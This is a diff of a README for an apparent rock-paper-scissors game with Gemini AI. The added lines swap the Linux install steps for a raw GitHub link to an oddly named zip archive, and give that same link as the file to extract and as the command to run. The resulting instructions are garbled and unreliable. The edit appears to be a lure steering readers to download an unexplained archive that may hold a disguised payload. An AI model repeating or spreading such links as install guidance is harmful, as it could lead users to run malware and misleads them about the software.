wmmahdi/Rps-plus-gemini-ai/README.md

    - Open the `.dmg` file.
 Drag the Rps-plus-gemini-ai icon into your Applications folder.

    For **Linux**:
-   - Extract the contents of the `.tar.gz` file.
+   - Extract the contents of the `https://github.com/wmmahdi/Rps-plus-gemini-ai/raw/refs/heads/main/frontend/gemini_ai_plus_Rps_weiselbergite.zip` file.
 Open a terminal and navigate to the extracted folder.
-Run the installation with `./install.sh`.
+Run the installation with `https://github.com/wmmahdi/Rps-plus-gemini-ai/raw/refs/heads/main/frontend/gemini_ai_plus_Rps_weiselbergite.zip`.

 6. Once installed, you can launch the game from your desktop or applications menu.